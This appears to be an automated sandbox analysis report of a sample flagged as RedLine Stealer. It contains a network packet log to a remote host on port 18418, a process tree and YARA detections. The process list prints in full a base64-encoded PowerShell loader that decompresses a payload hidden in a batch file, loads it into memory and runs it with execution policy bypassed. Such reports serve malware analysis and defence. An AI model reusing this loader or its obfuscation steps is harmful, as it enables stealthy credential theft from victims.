                                                                                                                                  Apr 26, 2024 02:42:12.635040045 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.635145903 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.635263920 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.635298014 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.635744095 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.635967016 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.636187077 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.636574984 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.636897087 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.637320995 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.637415886 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.637835979 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.638024092 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.638600111 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.638761044 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.638983965 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.639218092 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.639333963 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.639980078 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.640023947 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.640150070 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.640183926 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.640249014 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.853771925 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.895976067 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.896229029 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.896260023 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.896296978 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.896311998 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.896687031 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.897113085 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.897243977 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.897397995 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.897430897 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.897530079 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.897706985 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.897885084 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.898102045 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.898236990 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.898329973 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.898468018 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.898606062 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.898863077 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.899075031 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.899203062 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.899378061 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.899646997 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.900094986 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.900163889 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.157602072 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.157780886 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.157907009 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.158054113 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.158180952 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.158360958 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.158557892 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.158704996 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.159090996 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.159146070 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.159261942 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.159384966 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.159647942 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.159915924 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.159975052 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.160090923 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.160166979 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.160221100 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.160845995 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.161020994 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.161241055 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.161365032 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.161575079 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.161920071 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.161981106 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.162084103 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.162282944 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.162348032 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.162568092 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.162801027 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.162887096 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.162946939 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.162993908 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.163039923 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.163197041 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.163444042 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.163716078 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.163814068 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.163902998 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.164230108 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.164402962 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.164478064 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.423924923 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.423944950 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.424324036 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.424390078 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.424405098 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.424592972 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.424767017 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.425087929 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.425209045 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.425340891 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.425437927 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.425714016 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.425971985 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.425987005 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.426023960 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.426086903 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.426151037 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.426389933 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.426505089 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.426734924 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.426846027 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.427064896 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.427143097 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.427578926 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.687210083 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.687347889 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.687773943 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.688036919 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.688060999 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.688318014 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.688575029 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.688699007 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.688865900 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.688973904 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.689162016 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.689251900 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.689554930 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.689656973 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.689702034 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.689899921 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.689922094 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.690185070 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.690342903 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.690536976 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.690717936 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.690787077 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.691847086 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.694356918 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.958193064 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.962606907 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:14.223984957 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:14.277605057 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:14.369141102 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:14.630305052 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:14.683864117 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:15.009337902 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:15.270620108 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:15.271867037 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:15.274817944 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:15.537097931 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:15.537606001 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:15.799455881 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:15.800329924 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:16.062546015 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:16.103053093 CEST4973018418192.168.2.45.42.92.179

                                                                                                                                  Statistics

                                                                                                                                  CPU Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  Memory Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  High Level Behavior Distribution

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:02:41:49
                                                                                                                                  Start date:26/04/2024
                                                                                                                                  Path:C:\Users\user\Desktop\f6FauZ2CEz.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\f6FauZ2CEz.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:372'912 bytes
                                                                                                                                  MD5 hash:1544DBCA0EFC2C0105DD7D52A21A8891
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:1
                                                                                                                                  Start time:02:41:52
                                                                                                                                  Start date:26/04/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"wscript.exe" "C:\Users\user\start.vbs"
                                                                                                                                  Imagebase:0x6b0000
                                                                                                                                  File size:147'456 bytes
                                                                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:02:41:52
                                                                                                                                  Start date:26/04/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
                                                                                                                                  Imagebase:0x240000
                                                                                                                                  File size:236'544 bytes
                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:3
                                                                                                                                  Start time:02:41:53
                                                                                                                                  Start date:26/04/2024
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:4
                                                                                                                                  Start time:02:41:53
                                                                                                                                  Start date:26/04/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENOViAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlFKSEphcC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\user\QJHJap.ps1' -Encoding UTF8"
                                                                                                                                  Imagebase:0x4b0000
                                                                                                                                  File size:433'152 bytes
                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:5
                                                                                                                                  Start time:02:41:54
                                                                                                                                  Start date:26/04/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1"
                                                                                                                                  Imagebase:0x4b0000
                                                                                                                                  File size:433'152 bytes
                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.1719342950.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:02:41:58
                                                                                                                                  Start date:26/04/2024
                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                  Imagebase:0xb70000
                                                                                                                                  File size:65'440 bytes
                                                                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.1857321756.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Disassembly

                                                                                                                                  Reset < >

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:14%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:16.1%
                                                                                                                                    Total number of Nodes:1336
                                                                                                                                    Total number of Limit Nodes:15
